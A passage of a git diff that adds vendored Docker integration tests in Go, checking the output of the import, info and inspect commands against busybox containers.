+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "test-import", "busybox", "true")
+
+	temporaryFile, err := ioutil.TempFile("", "exportImportTest")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
+	defer os.Remove(temporaryFile.Name())
+
+	runCmd := exec.Command(dockerBinary, "export", "test-import")
+	w := gzip.NewWriter(temporaryFile)
+	runCmd.Stdout = w
+
+	_, err = runCommand(runCmd)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to export a container"))
+	err = w.Close()
+	c.Assert(err, checker.IsNil, check.Commentf("failed to close gzip writer"))
+	temporaryFile.Close()
+	out, _ := dockerCmd(c, "import", temporaryFile.Name())
+	c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't"))
+	image := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "run", "--rm", image, "true")
+	c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing."))
+}
+
+func (s *DockerSuite) TestImportFileWithMessage(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "test-import", "busybox", "true")
+
+	temporaryFile, err := ioutil.TempFile("", "exportImportTest")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
+	defer os.Remove(temporaryFile.Name())
+
+	runCmd := exec.Command(dockerBinary, "export", "test-import")
+	runCmd.Stdout = bufio.NewWriter(temporaryFile)
+
+	_, err = runCommand(runCmd)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to export a container"))
+
+	message := "Testing commit message"
+	out, _ := dockerCmd(c, "import", "-m", message, temporaryFile.Name())
+	c.Assert(out, checker.Count, "\n", 1, check.Commentf("display is expected 1 '\\n' but didn't"))
+	image := strings.TrimSpace(out)
+
+	out, _ = dockerCmd(c, "history", image)
+	split := strings.Split(out, "\n")
+
+	c.Assert(split, checker.HasLen, 3, check.Commentf("expected 3 lines from image history"))
+	r := regexp.MustCompile("[\\s]{2,}")
+	split = r.Split(split[1], -1)
+
+	c.Assert(message, checker.Equals, split[3], check.Commentf("didn't get expected value in commit message"))
+
+	out, _ = dockerCmd(c, "run", "--rm", image, "true")
+	c.Assert(out, checker.Equals, "", check.Commentf("command output should've been nothing"))
+}
+
+func (s *DockerSuite) TestImportFileNonExistentFile(c *check.C) {
+	_, _, err := dockerCmdWithError("import", "example.com/myImage.tar")
+	c.Assert(err, checker.NotNil, check.Commentf("import non-existing file must failed"))
+}
+
+func (s *DockerSuite) TestImportWithQuotedChanges(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "test-import", "busybox", "true")
+
+	temporaryFile, err := ioutil.TempFile("", "exportImportTest")
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file"))
+	defer os.Remove(temporaryFile.Name())
+
+	result := icmd.RunCmd(icmd.Cmd{
+		Command: binaryWithArgs("export", "test-import"),
+		Stdout:  bufio.NewWriter(temporaryFile),
+	})
+	c.Assert(result, icmd.Matches, icmd.Success)
+
+	result = dockerCmdWithResult("import", "-c", `ENTRYPOINT ["/bin/sh", "-c"]`, temporaryFile.Name())
+	c.Assert(result, icmd.Matches, icmd.Success)
+	image := strings.TrimSpace(result.Stdout())
+
+	result = dockerCmdWithResult("run", "--rm", image, "true")
+	c.Assert(result, icmd.Matches, icmd.Expected{Out: icmd.None})
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go
new file mode 100644
index 0000000000..62ce7e22f2
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_test.go
@@ -0,0 +1,234 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"net"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// ensure docker info succeeds
+func (s *DockerSuite) TestInfoEnsureSucceeds(c *check.C) {
+	out, _ := dockerCmd(c, "info")
+
+	// always shown fields
+	stringsToCheck := []string{
+		"ID:",
+		"Containers:",
+		" Running:",
+		" Paused:",
+		" Stopped:",
+		"Images:",
+		"OSType:",
+		"Architecture:",
+		"Logging Driver:",
+		"Operating System:",
+		"CPUs:",
+		"Total Memory:",
+		"Kernel Version:",
+		"Storage Driver:",
+		"Volume:",
+		"Network:",
+		"Live Restore Enabled:",
+	}
+
+	if daemonPlatform == "linux" {
+		stringsToCheck = append(stringsToCheck, "Init Binary:", "Security Options:", "containerd version:", "runc version:", "init version:")
+	}
+
+	if DaemonIsLinux.Condition() {
+		stringsToCheck = append(stringsToCheck, "Runtimes:", "Default Runtime: runc")
+	}
+
+	if experimentalDaemon {
+		stringsToCheck = append(stringsToCheck, "Experimental: true")
+	} else {
+		stringsToCheck = append(stringsToCheck, "Experimental: false")
+	}
+
+	for _, linePrefix := range stringsToCheck {
+		c.Assert(out, checker.Contains, linePrefix, check.Commentf("couldn't find string %v in output", linePrefix))
+	}
+}
+
+// TestInfoFormat tests `docker info --format`
+func (s *DockerSuite) TestInfoFormat(c *check.C) {
+	out, status := dockerCmd(c, "info", "--format", "{{json .}}")
+	c.Assert(status, checker.Equals, 0)
+	var m map[string]interface{}
+	err := json.Unmarshal([]byte(out), &m)
+	c.Assert(err, checker.IsNil)
+	_, _, err = dockerCmdWithError("info", "--format", "{{.badString}}")
+	c.Assert(err, checker.NotNil)
+}
+
+// TestInfoDiscoveryBackend verifies that a daemon run with `--cluster-advertise` and
+// `--cluster-store` properly show the backend's endpoint in info output.
+func (s *DockerSuite) TestInfoDiscoveryBackend(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	d := NewDaemon(c)
+	discoveryBackend := "consul://consuladdr:consulport/some/path"
+	discoveryAdvertise := "1.1.1.1:2375"
+	err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s", discoveryAdvertise))
+	c.Assert(err, checker.IsNil)
+	defer d.Stop()
+
+	out, err := d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: %s\n", discoveryBackend))
+	c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: %s\n", discoveryAdvertise))
+}
+
+// TestInfoDiscoveryInvalidAdvertise verifies that a daemon run with
+// an invalid `--cluster-advertise` configuration
+func (s *DockerSuite) TestInfoDiscoveryInvalidAdvertise(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	d := NewDaemon(c)
+	discoveryBackend := "consul://consuladdr:consulport/some/path"
+
+	// --cluster-advertise with an invalid string is an error
+	err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), "--cluster-advertise=invalid")
+	c.Assert(err, checker.Not(checker.IsNil))
+
+	// --cluster-advertise without --cluster-store is also an error
+	err = d.Start("--cluster-advertise=1.1.1.1:2375")
+	c.Assert(err, checker.Not(checker.IsNil))
+}
+
+// TestInfoDiscoveryAdvertiseInterfaceName verifies that a daemon run with `--cluster-advertise`
+// configured with interface name properly show the advertise ip-address in info output.
+func (s *DockerSuite) TestInfoDiscoveryAdvertiseInterfaceName(c *check.C) {
+	testRequires(c, SameHostDaemon, Network, DaemonIsLinux)
+
+	d := NewDaemon(c)
+	discoveryBackend := "consul://consuladdr:consulport/some/path"
+	discoveryAdvertise := "eth0"
+
+	err := d.Start(fmt.Sprintf("--cluster-store=%s", discoveryBackend), fmt.Sprintf("--cluster-advertise=%s:2375", discoveryAdvertise))
+	c.Assert(err, checker.IsNil)
+	defer d.Stop()
+
+	iface, err := net.InterfaceByName(discoveryAdvertise)
+	c.Assert(err, checker.IsNil)
+	addrs, err := iface.Addrs()
+	c.Assert(err, checker.IsNil)
+	c.Assert(len(addrs), checker.GreaterThan, 0)
+	ip, _, err := net.ParseCIDR(addrs[0].String())
+	c.Assert(err, checker.IsNil)
+
+	out, err := d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Store: %s\n", discoveryBackend))
+	c.Assert(out, checker.Contains, fmt.Sprintf("Cluster Advertise: %s:2375\n", ip.String()))
+}
+
+func (s *DockerSuite) TestInfoDisplaysRunningContainers(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	dockerCmd(c, "run", "-d", "busybox", "top")
+	out, _ := dockerCmd(c, "info")
+	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0))
+}
+
+func (s *DockerSuite) TestInfoDisplaysPausedContainers(c *check.C) {
+	testRequires(c, IsPausable)
+
+	out, _ := runSleepingContainer(c, "-d")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "pause", cleanedContainerID)
+
+	out, _ = dockerCmd(c, "info")
+	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 0))
+}
+
+func (s *DockerSuite) TestInfoDisplaysStoppedContainers(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "top")
+	cleanedContainerID := strings.TrimSpace(out)
+
+	dockerCmd(c, "stop", cleanedContainerID)
+
+	out, _ = dockerCmd(c, "info")
+	c.Assert(out, checker.Contains, fmt.Sprintf("Containers: %d\n", 1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Running: %d\n", 0))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Paused: %d\n", 0))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" Stopped: %d\n", 1))
+}
+
+func (s *DockerSuite) TestInfoDebug(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	d := NewDaemon(c)
+	err := d.Start("--debug")
+	c.Assert(err, checker.IsNil)
+	defer d.Stop()
+
+	out, err := d.Cmd("--debug", "info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Debug Mode (client): true\n")
+	c.Assert(out, checker.Contains, "Debug Mode (server): true\n")
+	c.Assert(out, checker.Contains, "File Descriptors")
+	c.Assert(out, checker.Contains, "Goroutines")
+	c.Assert(out, checker.Contains, "System Time")
+	c.Assert(out, checker.Contains, "EventsListeners")
+	c.Assert(out, checker.Contains, "Docker Root Dir")
+}
+
+func (s *DockerSuite) TestInsecureRegistries(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	registryCIDR := "192.168.1.0/24"
+	registryHost := "insecurehost.com:5000"
+
+	d := NewDaemon(c)
+	err := d.Start("--insecure-registry="+registryCIDR, "--insecure-registry="+registryHost)
+	c.Assert(err, checker.IsNil)
+	defer d.Stop()
+
+	out, err := d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Insecure Registries:\n")
+	c.Assert(out, checker.Contains, fmt.Sprintf(" %s\n", registryHost))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" %s\n", registryCIDR))
+}
+
+func (s *DockerDaemonSuite) TestRegistryMirrors(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	registryMirror1 := "https://192.168.1.2"
+	registryMirror2 := "http://registry.mirror.com:5000"
+
+	err := s.d.Start("--registry-mirror="+registryMirror1, "--registry-mirror="+registryMirror2)
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Registry Mirrors:\n")
+	c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror1))
+	c.Assert(out, checker.Contains, fmt.Sprintf(" %s", registryMirror2))
+}
+
+// Test case for #24392
+func (s *DockerDaemonSuite) TestInfoLabels(c *check.C) {
+	testRequires(c, SameHostDaemon, DaemonIsLinux)
+
+	err := s.d.Start("--label", `test.empty=`, "--label", `test.empty=`, "--label", `test.label="1"`, "--label", `test.label="2"`)
+	c.Assert(err, checker.IsNil)
+
+	out, err := s.d.Cmd("info")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "WARNING: labels with duplicate keys and conflicting values have been deprecated")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go
new file mode 100644
index 0000000000..b9323060dd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_info_unix_test.go
@@ -0,0 +1,15 @@
+// +build !windows
+
+package main
+
+import (
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestInfoSecurityOptions(c *check.C) {
+	testRequires(c, SameHostDaemon, seccompEnabled, Apparmor, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "info")
+	c.Assert(out, checker.Contains, "Security Options:\n apparmor\n seccomp\n  Profile: default\n")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go
new file mode 100644
index 0000000000..32ed28afe1
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_inspect_test.go
@@ -0,0 +1,466 @@
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"os/exec"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func checkValidGraphDriver(c *check.C, name string) {
+	if name != "devicemapper" && name != "overlay" && name != "vfs" && name != "zfs" && name != "btrfs" && name != "aufs" {
+		c.Fatalf("%v is not a valid graph driver name", name)
+	}
+}
+
+func (s *DockerSuite) TestInspectImage(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	imageTest := "emptyfs"
+	// It is important that this ID remain stable. If a code change causes
+	// it to be different, this is equivalent to a cache bust when pulling
+	// a legacy-format manifest. If the check at the end of this function
+	// fails, fix the difference in the image serialization instead of
+	// updating this hash.
+	imageTestID := "sha256:11f64303f0f7ffdc71f001788132bca5346831939a956e3e975c93267d89a16d"
+	id := inspectField(c, imageTest, "Id")
+
+	c.Assert(id, checker.Equals, imageTestID)
+}
+
+func (s *DockerSuite) TestInspectInt64(c *check.C) {
+	dockerCmd(c, "run", "-d", "-m=300M", "--name", "inspectTest", "busybox", "true")
+	inspectOut := inspectField(c, "inspectTest", "HostConfig.Memory")
+	c.Assert(inspectOut, checker.Equals, "314572800")
+}
+
+func (s *DockerSuite) TestInspectDefault(c *check.C) {
+	//Both the container and image are named busybox. docker inspect will fetch the container JSON.
+	//If the container JSON is not available, it will go for the image JSON.
+
+	out, _ := dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true")
+	containerID := strings.TrimSpace(out)
+
+	inspectOut := inspectField(c, "busybox", "Id")
+	c.Assert(strings.TrimSpace(inspectOut), checker.Equals, containerID)
+}
+
+func (s *DockerSuite) TestInspectStatus(c *check.C) {
+	if daemonPlatform != "windows" {
+		defer unpauseAllContainers()
+	}
+	out, _ := runSleepingContainer(c, "-d")
+	out = strings.TrimSpace(out)
+
+	inspectOut := inspectField(c, out, "State.Status")
+	c.Assert(inspectOut, checker.Equals, "running")
+
+	// Windows does not support pause/unpause on Windows Server Containers.
+	// (RS1 does for Hyper-V Containers, but production CI is not setup for that)
+	if daemonPlatform != "windows" {
+		dockerCmd(c, "pause", out)
+		inspectOut = inspectField(c, out, "State.Status")
+		c.Assert(inspectOut, checker.Equals, "paused")
+
+		dockerCmd(c, "unpause", out)
+		inspectOut = inspectField(c, out, "State.Status")
+		c.Assert(inspectOut, checker.Equals, "running")
+	}
+
+	dockerCmd(c, "stop", out)
+	inspectOut = inspectField(c, out, "State.Status")
+	c.Assert(inspectOut, checker.Equals, "exited")
+
+}
+
+func (s *DockerSuite) TestInspectTypeFlagContainer(c *check.C) {
+	//Both the container and image are named busybox. docker inspect will fetch container
+	//JSON State.Running field. If the field is true, it's a container.
+	runSleepingContainer(c, "--name=busybox", "-d")
+
+	formatStr := "--format={{.State.Running}}"
+	out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox")
+	c.Assert(out, checker.Equals, "true\n") // not a container JSON
+}
+
+func (s *DockerSuite) TestInspectTypeFlagWithNoContainer(c *check.C) {
+	//Run this test on an image named busybox. docker inspect will try to fetch container
+	//JSON. Since there is no container named busybox and --type=container, docker inspect will
+	//not try to get the image JSON. It will throw an error.
+
+	dockerCmd(c, "run", "-d", "busybox", "true")
+
+	_, _, err := dockerCmdWithError("inspect", "--type=container", "busybox")
+	// docker inspect should fail, as there is no container named busybox
+	c.Assert(err, checker.NotNil)
+}
+
+func (s *DockerSuite) TestInspectTypeFlagWithImage(c *check.C) {
+	//Both the container and image are named busybox. docker inspect will fetch image
+	//JSON as --type=image. if there is no image with name busybox, docker inspect
+	//will throw an error.
+
+	dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true")
+
+	out, _ := dockerCmd(c, "inspect", "--type=image", "busybox")
+	c.Assert(out, checker.Not(checker.Contains), "State") // not an image JSON
+}
+
+func (s *DockerSuite) TestInspectTypeFlagWithInvalidValue(c *check.C) {
+	//Both the container and image are named busybox. docker inspect will fail
+	//as --type=foobar is not a valid value for the flag.
+
+	dockerCmd(c, "run", "--name=busybox", "-d", "busybox", "true")
+
+	out, exitCode, err := dockerCmdWithError("inspect", "--type=foobar", "busybox")
+	c.Assert(err, checker.NotNil, check.Commentf("%s", exitCode))
+	c.Assert(exitCode, checker.Equals, 1, check.Commentf("%s", err))
+	c.Assert(out, checker.Contains, "not a valid value for --type")
+}
+
+func (s *DockerSuite) TestInspectImageFilterInt(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	imageTest := "emptyfs"
+	out := inspectField(c, imageTest, "Size")
+
+	size, err := strconv.Atoi(out)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect size of the image: %s, %v", out, err))
+
+	//now see if the size turns out to be the same
+	formatStr := fmt.Sprintf("--format={{eq .Size %d}}", size)
+	out, _ = dockerCmd(c, "inspect", formatStr, imageTest)
+	result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n"))
+	c.Assert(err, checker.IsNil)
+	c.Assert(result, checker.Equals, true)
+}
+
+func (s *DockerSuite) TestInspectContainerFilterInt(c *check.C) {
+	runCmd := exec.Command(dockerBinary, "run", "-i", "-a", "stdin", "busybox", "cat")
+	runCmd.Stdin = strings.NewReader("blahblah")
+	out, _, _, err := runCommandWithStdoutStderr(runCmd)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to run container: %v, output: %q", err, out))
+
+	id := strings.TrimSpace(out)
+
+	out = inspectField(c, id, "State.ExitCode")
+
+	exitCode, err := strconv.Atoi(out)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect exitcode of the container: %s, %v", out, err))
+
+	//now get the exit code to verify
+	formatStr := fmt.Sprintf("--format={{eq .State.ExitCode %d}}", exitCode)
+	out, _ = dockerCmd(c, "inspect", formatStr, id)
+	result, err := strconv.ParseBool(strings.TrimSuffix(out, "\n"))
+	c.Assert(err, checker.IsNil)
+	c.Assert(result, checker.Equals, true)
+}
+
+func (s *DockerSuite) TestInspectImageGraphDriver(c *check.C) {
+	testRequires(c, DaemonIsLinux, Devicemapper)
+	imageTest := "emptyfs"
+	name := inspectField(c, imageTest, "GraphDriver.Name")
+
+	checkValidGraphDriver(c, name)
+
+	deviceID := inspectField(c, imageTest, "GraphDriver.Data.DeviceId")
+
+	_, err := strconv.Atoi(deviceID)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceId of the image: %s, %v", deviceID, err))
+
+	deviceSize := inspectField(c, imageTest, "GraphDriver.Data.DeviceSize")
+
+	_, err = strconv.ParseUint(deviceSize, 10, 64)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceSize of the image: %s, %v", deviceSize, err))
+}
+
+func (s *DockerSuite) TestInspectContainerGraphDriver(c *check.C) {
+	testRequires(c, DaemonIsLinux, Devicemapper)
+
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	out = strings.TrimSpace(out)
+
+	name := inspectField(c, out, "GraphDriver.Name")
+
+	checkValidGraphDriver(c, name)
+
+	imageDeviceID := inspectField(c, "busybox", "GraphDriver.Data.DeviceId")
+
+	deviceID := inspectField(c, out, "GraphDriver.Data.DeviceId")
+
+	c.Assert(imageDeviceID, checker.Not(checker.Equals), deviceID)
+
+	_, err := strconv.Atoi(deviceID)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceId of the image: %s, %v", deviceID, err))
+
+	deviceSize := inspectField(c, out, "GraphDriver.Data.DeviceSize")
+
+	_, err = strconv.ParseUint(deviceSize, 10, 64)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to inspect DeviceSize of the image: %s, %v", deviceSize, err))
+}
+
+func (s *DockerSuite) TestInspectBindMountPoint(c *check.C) {
+	modifier := ",z"
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+	if daemonPlatform == "windows" {
+		modifier = ""
+		// TODO Windows: Temporary check - remove once TP5 support is dropped
+		if windowsDaemonKV < 14350 {
+			c.Skip("Needs later Windows build for RO volumes")
+		}
+		// Linux creates the host directory if it doesn't exist. Windows does not.
+		os.Mkdir(`c:\data`, os.ModeDir)
+	}
+
+	dockerCmd(c, "run", "-d", "--name", "test", "-v", prefix+slash+"data:"+prefix+slash+"data:ro"+modifier, "busybox", "cat")
+
+	vol := inspectFieldJSON(c, "test", "Mounts")
+
+	var mp []types.MountPoint
+	err := json.Unmarshal([]byte(vol), &mp)
+	c.Assert(err, checker.IsNil)
+
+	// check that there is only one mountpoint
+	c.Assert(mp, check.HasLen, 1)
+
+	m := mp[0]
+
+	c.Assert(m.Name, checker.Equals, "")
+	c.Assert(m.Driver, checker.Equals, "")
+	c.Assert(m.Source, checker.Equals, prefix+slash+"data")
+	c.Assert(m.Destination, checker.Equals, prefix+slash+"data")
+	if daemonPlatform != "windows" { // Windows does not set mode
+		c.Assert(m.Mode, checker.Equals, "ro"+modifier)
+	}
+	c.Assert(m.RW, checker.Equals, false)
+}
+
+func (s *DockerSuite) TestInspectNamedMountPoint(c *check.C) {
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	dockerCmd(c, "run", "-d", "--name", "test", "-v", "data:"+prefix+slash+"data", "busybox", "cat")
+
+	vol := inspectFieldJSON(c, "test", "Mounts")
+
+	var mp []types.MountPoint
+	err := json.Unmarshal([]byte(vol), &mp)
+	c.Assert(err, checker.IsNil)
+
+	// check that there is only one mountpoint
+	c.Assert(mp, checker.HasLen, 1)
+
+	m := mp[0]
+
+	c.Assert(m.Name, checker.Equals, "data")
+	c.Assert(m.Driver, checker.Equals, "local")
+	c.Assert(m.Source, checker.Not(checker.Equals), "")
+	c.Assert(m.Destination, checker.Equals, prefix+slash+"data")
+	c.Assert(m.RW, checker.Equals, true)
+}
+
+// #14947
+func (s *DockerSuite) TestInspectTimesAsRFC3339Nano(c *check.C) {
+	out, _ := dockerCmd(c, "run", "-d", "busybox", "true")
+	id := strings.TrimSpace(out)
+	startedAt := inspectField(c, id, "State.StartedAt")
+	finishedAt := inspectField(c, id, "State.FinishedAt")
+	created := inspectField(c, id, "Created")
+
+	_, err := time.Parse(time.RFC3339Nano, startedAt)
+	c.Assert(err, checker.IsNil)
+	_, err = time.Parse(time.RFC3339Nano, finishedAt)
+	c.Assert(err, checker.IsNil)
+	_, err = time.Parse(time.RFC3339Nano, created)
+	c.Assert(err, checker.IsNil)
+
+	created = inspectField(c, "busybox", "Created")
+
+	_, err = time.Parse(time.RFC3339Nano, created)
+	c.Assert(err, checker.IsNil)
+}
+
+// #15633
+func (s *DockerSuite) TestInspectLogConfigNoType(c *check.C) {
+	dockerCmd(c, "create", "--name=test", "--log-opt", "max-file=42", "busybox")
+	var logConfig container.LogConfig
+
+	out := inspectFieldJSON(c, "test", "HostConfig.LogConfig")
+
+	err := json.NewDecoder(strings.NewReader(out)).Decode(&logConfig)
+	c.Assert(err, checker.IsNil, check.Commentf("%v", out))
+
+	c.Assert(logConfig.Type, checker.Equals, "json-file")
+	c.Assert(logConfig.Config["max-file"], checker.Equals, "42", check.Commentf("%v", logConfig))
+}
+
+func (s *DockerSuite) TestInspectNoSizeFlagContainer(c *check.C) {
+
+	//Both the container and image are named busybox. docker inspect will fetch container
+	//JSON SizeRw and SizeRootFs field. If there is no flag --size/-s, there are no size fields.
+
+	runSleepingContainer(c, "--name=busybox", "-d")
+
+	formatStr := "--format={{.SizeRw}},{{.SizeRootFs}}"
+	out, _ := dockerCmd(c, "inspect", "--type=container", formatStr, "busybox")
+	c.Assert(strings.TrimSpace(out), check.Equals, "<nil>,<nil>", check.Commentf("Exepcted not to display size info: %s", out))
+}
+
+func (s *DockerSuite) TestInspectSizeFlagContainer(c *check.C) {
+	runSleepingContainer(c, "--name=busybox", "-d")
+
+	formatStr := "--format='{{.SizeRw}},{{.SizeRootFs}}'"
+	out, _ := dockerCmd(c, "inspect", "-s", "--type=container", formatStr, "busybox")
+	sz := strings.Split(out, ",")
+
+	c.Assert(strings.TrimSpace(sz[0]), check.Not(check.Equals), "<nil>")
+	c.Assert(strings.TrimSpace(sz[1]), check.Not(check.Equals), "<nil>")
+}
+
+func (s *DockerSuite) TestInspectTemplateError(c *check.C) {
+	// Template parsing error for both the container and image.
+
+	runSleepingContainer(c, "--name=container1", "-d")
+
+	out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='Format container: {{.ThisDoesNotExist}}'", "container1")
+	c.Assert(err, check.Not(check.IsNil))
+	c.Assert(out, checker.Contains, "Template parsing error")
+
+	out, _, err = dockerCmdWithError("inspect", "--type=image", "--format='Format container: {{.ThisDoesNotExist}}'", "busybox")
+	c.Assert(err, check.Not(check.IsNil))
+	c.Assert(out, checker.Contains, "Template parsing error")
+}
+
+func (s *DockerSuite) TestInspectJSONFields(c *check.C) {
+	runSleepingContainer(c, "--name=busybox", "-d")
+	out, _, err := dockerCmdWithError("inspect", "--type=container", "--format={{.HostConfig.Dns}}", "busybox")
+
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Equals, "[]\n")
+}
+
+func (s *DockerSuite) TestInspectByPrefix(c *check.C) {
+	id := inspectField(c, "busybox", "Id")
+	c.Assert(id, checker.HasPrefix, "sha256:")
+
+	id2 := inspectField(c, id[:12], "Id")
+	c.Assert(id, checker.Equals, id2)
+
+	id3 := inspectField(c, strings.TrimPrefix(id, "sha256:")[:12], "Id")
+	c.Assert(id, checker.Equals, id3)
+}
+
+func (s *DockerSuite) TestInspectStopWhenNotFound(c *check.C) {
+	runSleepingContainer(c, "--name=busybox", "-d")
+	runSleepingContainer(c, "--name=not-shown", "-d")
+	out, _, err := dockerCmdWithError("inspect", "--type=container", "--format='{{.Name}}'", "busybox", "missing", "not-shown")
+
+	c.Assert(err, checker.Not(check.IsNil))
+	c.Assert(out, checker.Contains, "busybox")
+	c.Assert(out, checker.Not(checker.Contains), "not-shown")
+	c.Assert(out, checker.Contains, "Error: No such container: missing")
+}
+
+func (s *DockerSuite) TestInspectHistory(c *check.C) {
+	dockerCmd(c, "run", "--name=testcont", "busybox", "echo", "hello")
+	dockerCmd(c, "commit", "-m", "test comment", "testcont", "testimg")
+	out, _, err := dockerCmdWithError("inspect", "--format='{{.Comment}}'", "testimg")
+	c.Assert(err, check.IsNil)
+	c.Assert(out, checker.Contains, "test comment")
+}
+
+func (s *DockerSuite) TestInspectContainerNetworkDefault(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	contName := "test1"
+	dockerCmd(c, "run", "--name", contName, "-d", "busybox", "top")
+	netOut, _ := dockerCmd(c, "network", "inspect", "--format={{.ID}}", "bridge")
+	out := inspectField(c, contName, "NetworkSettings.Networks")
+	c.Assert(out, checker.Contains, "bridge")
+	out = inspectField(c, contName, "NetworkSettings.Networks.bridge.NetworkID")
+	c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(netOut))
+}
+
+func (s *DockerSuite) TestInspectContainerNetworkCustom(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	netOut, _ := dockerCmd(c, "network", "create", "net1")
+	dockerCmd(c, "run", "--name=container1", "--net=net1", "-d", "busybox", "top")
+	out := inspectField(c, "container1", "NetworkSettings.Networks")
+	c.Assert(out, checker.Contains, "net1")
+	out = inspectField(c, "container1", "NetworkSettings.Networks.net1.NetworkID")
+	c.Assert(strings.TrimSpace(out), checker.Equals, strings.TrimSpace(netOut))
+}
+
+func (s *DockerSuite) TestInspectRootFS(c *check.C) {
+	out, _, err := dockerCmdWithError("inspect", "busybox")
+	c.Assert(err, check.IsNil)
+
+	var imageJSON []types.ImageInspect
+	err = json.Unmarshal([]byte(out), &imageJSON)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(len(imageJSON[0].RootFS.Layers), checker.GreaterOrEqualThan, 1)
+}
+
+func (s *DockerSuite) TestInspectAmpersand(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	name := "test"
+	out, _ := dockerCmd(c, "run", "--name", name, "--env", `TEST_ENV="soanni&rtr"`, "busybox", "env")
+	c.Assert(out, checker.Contains, `soanni&rtr`)
